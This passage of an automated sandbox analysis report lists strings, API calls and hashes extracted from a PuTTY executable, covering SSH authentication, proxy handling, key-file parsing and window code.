                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    • passphrase prompt, xrefs: 00C0B1F1
                    • Authentication plugin set username '%s', xrefs: 00C0957C
                    • Sent new password, xrefs: 00C0BCF6
                    • GSSAPI authentication initialised, xrefs: 00C0B245
                    • Authentication plugin failed to set up keyboard-interactive authentication:, xrefs: 00C0A5E8
                    • Offer of public key accepted, xrefs: 00C0A8CD
                    • Authentication plugin failed to initialise:, xrefs: 00C094E6
                    • Pageant's response was truncated, xrefs: 00C0931D
                    • Server refused public-key signature despite accepting key!, xrefs: 00C09CE1
                    • Unable to load key (%s), xrefs: 00C09066
                    • GSSAPI authentication loop finished OK, xrefs: 00C0B3E0
                    • Failed to get reply from Pageant, xrefs: 00C090BD
                    • s->type == AUTH_TYPE_PASSWORD, xrefs: 00C0AAEC
                    • Server rejected new password, xrefs: 00C0BD32
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/userauth2-client.c, xrefs: 00C09409, 00C0A547, 00C0AAE7, 00C0B784, 00C0B7F4
                    • password-change prompt, xrefs: 00C0BDB2
                    • Started authentication plugin: %s, xrefs: 00C0936A
                    • Trying gssapi-keyex..., xrefs: 00C0A1BD
                    • Received malformed PLUGIN_PROTOCOL_REJECT from auth helper plugin, xrefs: 00C0AD26
                    • Further authentication required, xrefs: 00C09AE6
                    • Pageant failed to provide a signature, xrefs: 00C09058
                    • Current password (blank for previously entered password): , xrefs: 00C0BA91
                    • Authentication plugin declined to help with keyboard-interactive: %.*s, xrefs: 00C0A648
                    • Access denied, xrefs: 00C0AB12
                    • none, xrefs: 00C0984D
                    • gssapi-with-mic, xrefs: 00C09C01, 00C0A2B7, 00C0B3FB
                    • Pageant refused signing request, xrefs: 00C0903F
                    • Passwords do not match, xrefs: 00C0BBCE
                    • Authentication plugin agreed to help with keyboard-interactive, xrefs: 00C0A65B
                    • Wrong passphrase, xrefs: 00C0B17F
                    • Auth helper plugin announced unsupported version number %u, xrefs: 00C094DA
                    • Pageant failed to respond to signing request, xrefs: 00C090C7
                    • GSSAPI authentication failed, xrefs: 00C0B33C
                    • No supported authentication methods available (server sent: %s), xrefs: 00C0AC03
                    • Trying gssapi-with-mic..., xrefs: 00C0A25C
                    • Key file contains public key only, xrefs: 00C08D9E
                    • Confirm new password: , xrefs: 00C0BACD
                    • Unable to use this certificate file (%s), xrefs: 00C09251
                    • Further authentication required, xrefs: 00C09ACF
                    • %s, xrefs: 00C0BA15
                    • expected PLUGIN_PROTOCOL_ACCEPT or PLUGIN_PROTOCOL_REJECT, xrefs: 00C0AC55
                    • %s@%s's password: , xrefs: 00C09FEC
                    • expected PLUGIN_KI_SERVER_RESPONSE or PLUGIN_PROTOCOL_USER_REQUEST, xrefs: 00C0B9E7
                    • Passphrase for key "%s": , xrefs: 00C0AF06
                    • Sending Pageant's response, xrefs: 00C095BC
                    • Enter new password: , xrefs: 00C0BAAF
                    • keyboard-interactive authentication prompt, xrefs: 00C0B622
                    • GSSAPI import name failed - Bad service name, xrefs: 00C0AD6B
                    • Pageant has %zu SSH-2 keys, xrefs: 00C08F1F
                    • Using username "%s"., xrefs: 00C096DE
                    • Access granted, xrefs: 00C0AC0D
                    • Unable to use this key file (%s), xrefs: 00C09118
                    • unrecognised certificate type '%s', xrefs: 00C095B3
                    • Received malformed PLUGIN_INIT_RESPONSE from auth helper plugin, xrefs: 00C09498
                    • Received unexpected packet after SSH_MSG_USERAUTH_GSSAPI_ERRTOK (expected SSH_MSG_USERAUTH_FAILURE): type %d (%s), xrefs: 00C0B495
                    • Pre-authentication banner message from server:, xrefs: 00C0996E
                    • Reading certificate file "%s", xrefs: 00C091A6
                    • Authentication plugin declined to help with keyboard-interactive, xrefs: 00C0A689
                    • Unable to authenticate, xrefs: 00C0AACC, 00C0B1E5, 00C0B616, 00C0BDA6
                    • password, xrefs: 00C09BBD, 00C0A0D3, 00C0BC6A
                    • username prompt, xrefs: 00C098AC
                    • login as: , xrefs: 00C09732
                    • GSSAPI authentication initialisation failed, xrefs: 00C0B361
                    • Server refused public-key signature despite accepting key!, xrefs: 00C09CCA
                    • Authenticating with public key "%s", xrefs: 00C0A902
                    • Sent password, xrefs: 00C0A123
                    • Pageant is running. Requesting keys., xrefs: 00C092CE
                    • key type '%s' is not a certificate, xrefs: 00C09624
                    • password prompt, xrefs: 00C0AAD8
                    • Configured key file not in Pageant, xrefs: 00C08F90
                    • GSSAPI authentication - wrong response from server, xrefs: 00C0A3E7
                    • Unable to use certificate file "%s" (%s), xrefs: 00C0927A
                    • Offered public key, xrefs: 00C0A886
                    • Unable to load key file "%s" (%s), xrefs: 00C09093
                    • Received malformed PLUGIN_INIT_FAILURE from auth helper plugin, xrefs: 00C094BA
                    • End of keyboard-interactive prompts from server, xrefs: 00C0B69C
                    • End of keyboard-interactive prompts from plugin, xrefs: 00C0B6A1, 00C0B6B7
                    • GSSAPI authentication request refused, xrefs: 00C0A40C
                    • gssapi-keyex, xrefs: 00C09C25, 00C0A1D8
                    • End of banner message from server, xrefs: 00C09A55
                    • Reading key file "%s", xrefs: 00C08D1D
                    • SSH login name, xrefs: 00C0971C
                    • <, xrefs: 00C0B62C
                    • publickey, xrefs: 00C09BA4, 00C09E83, 00C0A81B, 00C0A9EF, 00C0AE27
                    • New SSH password, xrefs: 00C0BA5E
                    • Attempting GSSAPI authentication, xrefs: 00C0A2C5
                    • s->authplugin, xrefs: 00C0940E, 00C0A54C, 00C0B789, 00C0B7F9
                    • GSSAPI authentication failed to get credentials, xrefs: 00C0ABCA
                    • %.*s, xrefs: 00C09516, 00C0A618
                    • Pageant failed to respond to signing request, xrefs: 00C090E0
                    • Authentication was trivial! Abandoning session as specified in configuration., xrefs: 00C0AC40
                    • No supported authentication methods available, xrefs: 00C0ABEF
                    • <, xrefs: 00C0B49F
                    • Unable to load private key (%s), xrefs: 00C0B195
                    • Received unexpected packet in response to authentication request, type %d (%s), xrefs: 00C09AA0
                    • Trying Pageant key #%zu, xrefs: 00C09E28
                    • SSH key passphrase, xrefs: 00C0AEEA
                    • Sent public key signature, xrefs: 00C0B102
                    • Pageant key #%zu matches configured key file, xrefs: 00C09637
                    • Attempting keyboard-interactive authentication, xrefs: 00C0A4DA
                    • Authenticating with public key "%.*s" from agent, xrefs: 00C0A98D
                    • Cannot use this private key (%s), xrefs: 00C0B00A
                    • Server requested password change, xrefs: 00C0A169, 00C0B9FA, 00C0BA14
                    • Unable to use key file "%s" (%s), xrefs: 00C0914C
                    • GSSAPI authentication - bad server response, xrefs: 00C0B452
                    • GSSAPI import name failed, xrefs: 00C0ADA1, 00C0ADA6
                    • expected PLUGIN_INIT_RESPONSE or PLUGIN_INIT_FAILURE, xrefs: 00C094C4
                    • Password authentication failed, xrefs: 00C0AAF9
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • passphrase prompt, xrefs: 00C07212
                    • host key verification, xrefs: 00C0557F
                    • Couldn't load private key from %s (%s)., xrefs: 00C065EF
                    • Received unexpected packet in response to password authentication, type %d (%s), xrefs: 00C0726B
                    • Sending unpadded password, xrefs: 00C06EEF
                    • Pageant's response was truncated, xrefs: 00C05FB5
                    • Server refused our public key., xrefs: 00C066E1
                    • Requesting compression, xrefs: 00C07104
                    • Unable to load key (%s), xrefs: 00C05B5B
                    • Failed to get reply from Pageant, xrefs: 00C05EFD
                    • Sent username "%s", xrefs: 00C0597A
                    • SSH-1 public keys were badly formatted, xrefs: 00C05458
                    • Received TIS challenge, xrefs: 00C0697B
                    • Trying to enable encryption..., xrefs: 00C05805
                    • No supported ciphers found, xrefs: 00C05BDA
                    • Received CryptoCard challenge, xrefs: 00C06B8B
                    • Encrypted session key, xrefs: 00C0562C
                    • Using Blowfish encryption, xrefs: 00C05773
                    • Access denied, xrefs: 00C06FDE
                    • Key refused, xrefs: 00C063DF
                    • Server's RSA challenge was badly formatted, xrefs: 00C06474
                    • Authenticated using RSA key "%.*s" from agent, xrefs: 00C063BF
                    • Authentication refused, xrefs: 00C06FF5
                    • No reply received from Pageant, xrefs: 00C06425
                    • Using 3DES encryption, xrefs: 00C05758
                    • TIS authentication declined, xrefs: 00C06915
                    • Received unexpected packet in response to TIS authentication, type %d (%s), xrefs: 00C07232
                    • Sending password with camouflage packets, xrefs: 00C06ED3
                    • CryptoCard authentication response: , xrefs: 00C06C78
                    • SSH-1 public key encryptions failed due to bad formatting, xrefs: 00C0572E
                    • Key file contains public key only, xrefs: 00C05A70
                    • cipher, xrefs: 00C05C00
                    • -- End of CryptoCard authentication challenge from server: -------------------, xrefs: 00C06C6A
                    • -- TIS authentication challenge from server: ---------------------------------, xrefs: 00C069D1
                    • SSH CryptoCard authentication, xrefs: 00C06BBB
                    • Pageant failed to answer challenge, xrefs: 00C06401
                    • Requested TIS authentication, xrefs: 00C0689B
                    • TIS authentication response: , xrefs: 00C06A66, 00C06CA1
                    • %s@%s's password: , xrefs: 00C06CFD
                    • Authentication successful, xrefs: 00C070D3
                    • Trying public key "%s", xrefs: 00C06048
                    • Encryption not successfully enabled, xrefs: 00C05AA4
                    • Passphrase for key "%s": , xrefs: 00C064D7
                    • Sending length-padded password, xrefs: 00C06DAC
                    • Sending Pageant's response, xrefs: 00C062E9
                    • Public key packet not received, xrefs: 00C053E8
                    • Pageant's response not accepted, xrefs: 00C063FA
                    • TIS authentication refused., xrefs: 00C0693E
                    • Bad SSH-1 public key packet, xrefs: 00C05393
                    • Unable to use this key file (%s), xrefs: 00C05B0D
                    • AES not supported in SSH-1, skipping, xrefs: 00C056A8
                    • Pageant's response accepted, xrefs: 00C06375
                    • Server refused to enable compression, xrefs: 00C0718E
                    • Sent username "%s", xrefs: 00C05938
                    • username prompt, xrefs: 00C05204
                    • login as: , xrefs: 00C05AE0
                    • Sent password, xrefs: 00C06F51
                    • Received unexpected packet in response to compression request, type %d (%s), xrefs: 00C07298
                    • Pageant is running. Requesting keys., xrefs: 00C05C93
                    • Received unexpected packet in response to offer of public key, type %d (%s), xrefs: 00C07258
                    • password prompt, xrefs: 00C0721C
                    • Configured key file not in Pageant, xrefs: 00C05F7E
                    • cipher warning, xrefs: 00C05259
                    • SSH TIS authentication, xrefs: 00C069AB
                    • 3DES, xrefs: 00C05682
                    • Wrong passphrase., xrefs: 00C0647E
                    • Failed to authenticate with our public key., xrefs: 00C0683F
                    • Trying public key authentication., xrefs: 00C06025
                    • pwlen >= bottom && pwlen <= top, xrefs: 00C06EBE
                    • Unable to load key file "%s" (%s), xrefs: 00C05B85
                    • TIS challenge packet was badly formed, xrefs: 00C07278
                    • rsa, xrefs: 00C054F4
                    • Reading key file "%s", xrefs: 00C05A05
                    • Server refused to compress, xrefs: 00C071A7
                    • SSH login name, xrefs: 00C05ACA
                    • CryptoCard authentication refused., xrefs: 00C06B4B
                    • SSH password, xrefs: 00C06CE1
                    • single-DES, xrefs: 00C056D0
                    • Requested CryptoCard authentication, xrefs: 00C06AB8
                    • false && "unexpected return from rsa1_load_f()", xrefs: 00C072BA
                    • Received unexpected packet in response to RSA authentication, type %d (%s), xrefs: 00C07245
                    • Pageant has %zu SSH-1 keys, xrefs: 00C05F14
                    • Blowfish, xrefs: 00C0569C
                    • CryptoCard challenge packet was badly formed, xrefs: 00C07282
                    • Using single-DES encryption, xrefs: 00C0576C, 00C05778
                    • Authentication was trivial! Abandoning session as specified in configuration., xrefs: 00C070C9
                    • -- End of TIS authentication challenge from server: --------------------------, xrefs: 00C06A58
                    • -- CryptoCard authentication challenge from server: --------------------------, xrefs: 00C06BDF
                    • No supported authentication methods available, xrefs: 00C071E2
                    • %s, xrefs: 00C05341
                    • Trying Pageant key #%zu, xrefs: 00C0611E
                    • SSH key passphrase, xrefs: 00C064BE
                    • Pageant key #%zu matches configured key file, xrefs: 00C060D8
                    • Received RSA challenge, xrefs: 00C061B0
                    • Received public keys, xrefs: 00C0529E
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/login1.c, xrefs: 00C06EB9, 00C072B5
                    • CryptoCard authentication declined, xrefs: 00C06B32
                    • Successfully started encryption, xrefs: 00C058CD
                    • Server violates SSH-1 protocol by not supporting 3DES encryption, xrefs: 00C0571E
                    • Host key fingerprint is:, xrefs: 00C05323
                    • Unable to use key file "%s" (%s), xrefs: 00C05B3E
                    • No passphrase required., xrefs: 00C06088
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$Append$Create$Window$Rect$CapsClientDevice$BitmapCaretClickDeleteDesktopDoubleErrorInfoLastPopupReleaseScrollSystemTime
                    • String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %s:%d$Basic$CONNECT$CONNECT %s HTTP/1.1Host: %s$Content-Length$Digest$Digest authentication not supported$Digest hash algorithm '%s' not recognised$Digest hash algorithm '%s' not supported$HTTP proxy authentication$HTTP proxy requested authentication which we do not have$HTTP response %s$HTTP response was absent or malformed$HTTP/%d.%d %n%d$Missing CRLF after chunk during HTTP chunked transfer encoding$Proxy password: $Proxy username: $Proxy-Authenticate$Proxy-Authorization: Basic $Proxy-Authorization: Digest $Proxy-Connection$Received bad character 0x%02X in chunk length during HTTP chunked transfer encoding$Transfer-Encoding$algorithm$auth$authentication type '%s' not supported$chunked$close$keep-alive$no Proxy-Authorization header seen in HTTP 407 Proxy Authentication Required response$nonce$opaque$parse error$parse error in Digest algorithm field$parse error in Digest header$parse error in Digest nonce field$parse error in Digest opaque field$parse error in Digest qop field$parse error in Digest realm field$parse error in Digest stale field$parse error in Digest userhash field$qop$quality-of-protection type '%s' not supported$realm$stale$true$userhash
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • SOCKS proxy failed to connect, error %d (%s), xrefs: 00C208EF
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/proxy/socks5.c, xrefs: 00C20B62, 00C20C00, 00C20E5D
                    • SOCKS server sent unrecognised error code %d, xrefs: 00C20462
                    • SOCKS 5 CHAP reply had version number %d (expected %d), xrefs: 00C20C5D
                    • SOCKS proxy response contained reply version number %d (expected 0), xrefs: 00C203D6
                    • SOCKS 5 password reply had version number %d (expected %d), xrefs: 00C20BD8
                    • SOCKS 5 authentication cannot support passwords longer than 255 chars, xrefs: 00C20BF4
                    • unknown, xrefs: 00C207CE, 00C207DE, 00C208B7, 00C208ED
                    • socks5_chap_available, xrefs: 00C20B67
                    • SOCKS proxy authentication, xrefs: 00C20888
                    • connection refused, xrefs: 00C208D3
                    • SOCKS 5 cannot support host names longer than 255 chars, xrefs: 00C20E06
                    • SOCKS proxy response included unknown address type %d, xrefs: 00C20930
                    • SOCKS 5 CHAP authentication failed, xrefs: 00C20CF8
                    • SOCKS 5 server rejected our password, xrefs: 00C20B23
                    • network unreachable, xrefs: 00C208C5
                    • SOCKS version 4 does not support IPv6, xrefs: 00C2045A
                    • false && "Unexpected addrtype in SOCKS 5 proxy", xrefs: 00C20E62
                    • SOCKS server reported failure to connect, xrefs: 00C2046C
                    • Proxy username: , xrefs: 00C20951
                    • unspecified failure, xrefs: 00C20636
                    • SOCKS server asked for auth method %d (%s), which we did not offer, xrefs: 00C207E3
                    • command not supported, xrefs: 00C208E1
                    • SOCKS 5 CHAP authentication cannot support usernames longer than 255 chars, xrefs: 00C20BCE
                    • TTL expired, xrefs: 00C208DA
                    • SOCKS server wanted IDENTD on client, xrefs: 00C20473
                    • address type not supported, xrefs: 00C208E8
                    • SOCKS server rejected every authentication method we offered, xrefs: 00C20835
                    • SOCKS 5 authentication cannot support usernames longer than 255 chars, xrefs: 00C20BED
                    • host unreachable, xrefs: 00C208CC
                    • false && "bad auth method in SOCKS 5 negotiation", xrefs: 00C20C05
                    • SOCKS proxy returned unexpected reply version %d (expected %d), xrefs: 00C207FB
                    • Username and IDENTD on client don't agree, xrefs: 00C2047A
                    • SOCKS 5 CHAP reply sent no attributes, xrefs: 00C20C4B
                    • Proxy password: , xrefs: 00C20996
                    • connection not allowed by ruleset, xrefs: 00C208BE
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %02x$Argon2-Memory$Argon2-Parallelism$Argon2-Passes$Argon2-Salt$Argon2d$Argon2i$Argon2id$Comm$Encryption$Key-Derivation$MAC failed$Private-Hash$Private-Lines$Private-MAC$PuTTY key format too new$PuTTY-User-Key-File-$PuTTY-User-Key-File-1$PuTTY-User-Key-File-2$PuTTY-User-Key-File-3$Public-Lines$aes256-cbc$createkey failed$ent$file format error$no header line found in key file$none$not a PuTTY SSH-2 private key$wrong passphrase
                    • API String ID: 4218353326-2268154444
                    • Opcode ID: cc7bebf8eb708b3d88b21ad6838731fc8557e467234e39f2e46c24c79b6d0424
                    • Instruction ID: 722acecba17f967223a70dd0332f30300e0e44af35909947184dced46e4335bb
                    • Opcode Fuzzy Hash: cc7bebf8eb708b3d88b21ad6838731fc8557e467234e39f2e46c24c79b6d0424
                    • Instruction Fuzzy Hash: 804239B59043405BDB20AF60DC42BEF77E1AF86304F04482CF98997252EB75DA99E793
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: !ctrl->delay_taborder$!dp->shortcuts[s]$(ctrl->columns.ncols == 1) ^ (ncols == 1)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$BUTTON$COMBOBOX$EDIT$LISTBOX$STATIC$false && "bad control type in winctrl_layout"$i < ntabdelays$ncols <= lenof(columns)$nshortcuts < MAX_SHORTCUTS_PER_CTRL$ntabdelays < lenof(tabdelays)$ret == c$thisc$ud$win
                    • API String ID: 4218353326-3405042439
                    • Opcode ID: 019e2657382eb087d3f5a55bf2ef7c31b8381b3802d283bb7ab120e38e648b84
                    • Instruction ID: c4687cbb02708cad104e61c8228ae74883bf8c726e745b45011e725379f58140
                    • Opcode Fuzzy Hash: 019e2657382eb087d3f5a55bf2ef7c31b8381b3802d283bb7ab120e38e648b84
                    • Instruction Fuzzy Hash: 18C2CF71A08301AFD720DF18CC81B6AF7E5EF85704F04496EF9899B392E771A954CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Color$ModeObjectSelectText
                    • String ID: $
                    • API String ID: 3594386986-3993045852
                    • Opcode ID: 2f0cc38a96d276b7514855e1aeaafcdb57710fee5e47912f96fcf5fe74d7cc7c
                    • Instruction ID: f6865375474fd7ff013ac69b876085d8a892b068467109fdd16496c896e0ff71
                    • Opcode Fuzzy Hash: 2f0cc38a96d276b7514855e1aeaafcdb57710fee5e47912f96fcf5fe74d7cc7c
                    • Instruction Fuzzy Hash: EA92F171A083019FDB24CF14CC91BBEBBE5FB84304F19866DF986972A1DBB59844DB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00BE62F6
                    • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00BE630F
                    • _strncpy.LIBCMT ref: 00BE6330
                    • setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000001,00000004), ref: 00BE635D
                    • getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00BE64D3
                    • htons.WS2_32(?), ref: 00BE6528
                    • bind.WS2_32(00000000,00000001,00000010), ref: 00BE6565
                    • listen.WS2_32(00000000,7FFFFFFF), ref: 00BE6576
                    • closesocket.WS2_32(00000000), ref: 00BE6593
                    • WSAGetLastError.WS2_32 ref: 00BE65BA
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/network.c, xrefs: 00BE664F
                    • false && "bad address family in sk_newlistener_internal", xrefs: 00BE6654
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorHandleInformationLast_strncpybindclosesocketgetaddrinfohtonslistensetsockoptsocket
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                    • API String ID: 1644184481-952207300
                    • Opcode ID: d5ef2cc4332422962b2c76610a38e818d6fb304936367beaa6ca85dfb0782711
                    • Instruction ID: 70a83804bce18ce3d1d0b0e6e360f14fef8d8586ae11932d120fe955916024c8
                    • Opcode Fuzzy Hash: d5ef2cc4332422962b2c76610a38e818d6fb304936367beaa6ca85dfb0782711
                    • Instruction Fuzzy Hash: 97B16AB05083809FE3249F25D859B5BBBF4FFA4354F144A5CE48A8B2A1DB79D848CB52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BD50F9
                      • Part of subcall function 00BD5470: _strlen.LIBCMT ref: 00BD549D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: LocalTime_strftime_strlen
                    • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                    • API String ID: 4241967358-2889948183
                    • Opcode ID: 41c74728c12655e7cd80873666fcc46cf4b44f68762b512d71469509efa97357
                    • Instruction ID: 7920ca8a0bc20286dccee30c97676955570a08d2fe9f4abb0164a0710492055b
                    • Opcode Fuzzy Hash: 41c74728c12655e7cd80873666fcc46cf4b44f68762b512d71469509efa97357
                    • Instruction Fuzzy Hash: DDA10471A09B409BCB34AA14D895BBFF3E5EFC5305F44446EE88987305F671A844CB93
                    Uniqueness

